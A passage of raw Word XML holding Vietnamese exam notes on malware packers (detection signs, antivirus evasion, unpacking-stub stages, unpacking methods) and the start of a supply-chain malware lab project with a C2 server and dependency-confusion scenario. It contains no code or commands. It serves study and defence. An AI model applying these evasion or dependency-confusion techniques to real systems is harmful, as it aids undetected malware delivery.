        <w:t>Pack</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (đóng gói). Các dấu hiệu nhận biết:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5DF57" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Entropy cao (~7.5-8.0) → nội dung bị nén/mã hóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615FE93" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>IAT chỉ có LoadLibrary + GetProcAddress → unpacking stub sẽ tự resolve import lúc runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D416E8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Entry Point trỏ vào section lạ (không phải .text) → đang trỏ vào unpacking stub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677FA363" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>File size nhỏ so với chức năng → nội dung bị nén</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABF664" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="34B31F05">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E18239C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>② Hậu quả giấu hiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1AE3DF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:lastRenderedPageBreak/>
        <w:t>AV scan file trên disk → chỉ thấy stub nén → không match signature → bypass hoàn toàn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4D7CC" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>strings tool → không trích được URL/IP/API name → static analysis mù</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF79BA1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>IDA disassemble → thấy toàn garbage (encrypted bytes) → reverse engineering thất bại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A4654" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Payload thật chỉ xuất hiện trong RAM sau khi unpack → khó forensic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3008F25D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="56B9C14E">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62469833" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>③ Cơ chế Packer — 3 bước Unpacking Stub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949C221" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1 — Load:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA95184" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>OS loader đọc PE header của packed file → cấp phát memory cho các section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A91383" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Control pass sang </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unpacking stub</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (không phải code gốc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185E6B46" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2 — Giải nén/Giải mã:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7946185F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Stub giải nén/decrypt payload gốc vào memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121DA58" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Gọi LoadLibrary cho từng DLL cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC20FC0" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Gọi GetProcAddress để lấy địa chỉ từng API → tự build lại IAT trong memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E311EA" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3 — Tail Jump (nhảy về OEP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F331DB1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Stub hoàn thành → jmp tới </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OEP (Original Entry Point)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4706E76B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Từ đây code gốc chạy bình thường trong memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8BEB9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Trên disk: vẫn là file packed → AV không thấy gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E9AAA7" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ví dụ packer phổ biến:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> UPX, ASPack, MPRESS (legitimate), Themida, VMProtect (malicious use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44B4CB" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="2F39B9E9">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D8876B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>④ Phòng chống &amp; Khắc phục (Phân tích)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CFEC23" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3 cách unpack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2D381" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static unpacking tự động:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> PE Explorer, UPX -d nếu nhận ra packer → nhanh nhất nhưng chỉ dùng được với packer phổ biến</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7798DF11" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dynamic unpacking tự động:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> chạy trong sandbox → dump memory sau khi stub chạy xong → lấy payload thật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB27BE6" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manual dynamic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> đặt breakpoint tại tail jump (lệnh jmp cuối stub) → khi nhảy về OEP → dump process memory → fix PE header thủ công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047EF9C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận diện sớm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C01155" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Kiểm tra entropy: &gt; 7.0 trên toàn section → nghi ngờ packed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D65C5AA" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>IAT analysis: nếu chỉ có 2-3 API → chắc chắn packed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245CF828" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PEiD, Detect-it-Easy (DiE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> → nhận diện loại packer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA8D181" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="549DDAB0">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7079F377" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mẹo thi 3 dạng mới này:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Dạng 3 (Injection) nhớ viết đúng API chain theo thứ tự. Dạng 4 (APT) nhớ nêu tên cụ thể Emotet → TrickBot → Ryuk + thời gian nằm im 3-12 tháng. Dạng 5 (Packer) nhớ 3 dấu hiệu nhận biết (entropy, IAT, EP lạ) + 3 bước unpack stub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D9DC91" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CÂU 2 — ĐỒ ÁN MÔN HỌC (Supply Chain Software Malware — S04)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF6D1C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đề dự đoán:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mô tả kiến trúc, ưu/nhược điểm và hướng phát triển của đồ án môn học.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02399B20" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="1BE7EAC2">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700C6D4" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(a) Kiến trúc hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8B9A9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tên đề tài:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Supply Chain Software Malware — S04</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> MITRE ATT&amp;CK T1195.001 — Compromise Software Dependencies and Development Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Môi trường lab:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Ubuntu 24.04 (Attacker + Corp Registry) + Windows 10 VM (Victim) — mạng NAT/host-only VMware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5788E5" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3 thành phần kiến trúc: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1"/>
        <w:gridCol w:w="3390"/>
        <w:gridCol w:w="3209"/>
      </w:tblGrid>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="1130104A" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252BA6D0" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16AB4970" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="442D194A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Công nghệ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="0D12C882" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BEDA9A4" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Corp Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00451406">
              <w:t xml:space="preserve"> (192.168.56.128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6791F2B6" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Private PyPI registry nội bộ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65190CF4" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Python HTTP server, cổng 8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="225A8D15" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24A2CADE" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
            <w:r w:rsidRPr="00451406">
              <w:t xml:space="preserve"> (192.168.56.129)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="144D5D80" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Build + upload package độc, C2 server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7708A979" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Python, Twine, c2_server.py cổng 8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="7C793CB9" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06E31781" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Victim</w:t>
            </w:r>
            <w:r w:rsidRPr="00451406">
              <w:t xml:space="preserve"> (192.168.56.130)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51095E2B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Developer Windows cài package, bị nhiễm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F6E7B33" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Windows 10, PowerShell, pip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="521B864F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3 kịch bản tấn công triển khai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC5D58" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản A — Dependency Confusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Khai thác --extra-index-url → pip ưu tiên package public (v99.0.0) thay vì internal (v1.0.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6095A7DF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản B — Transitive Dependency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
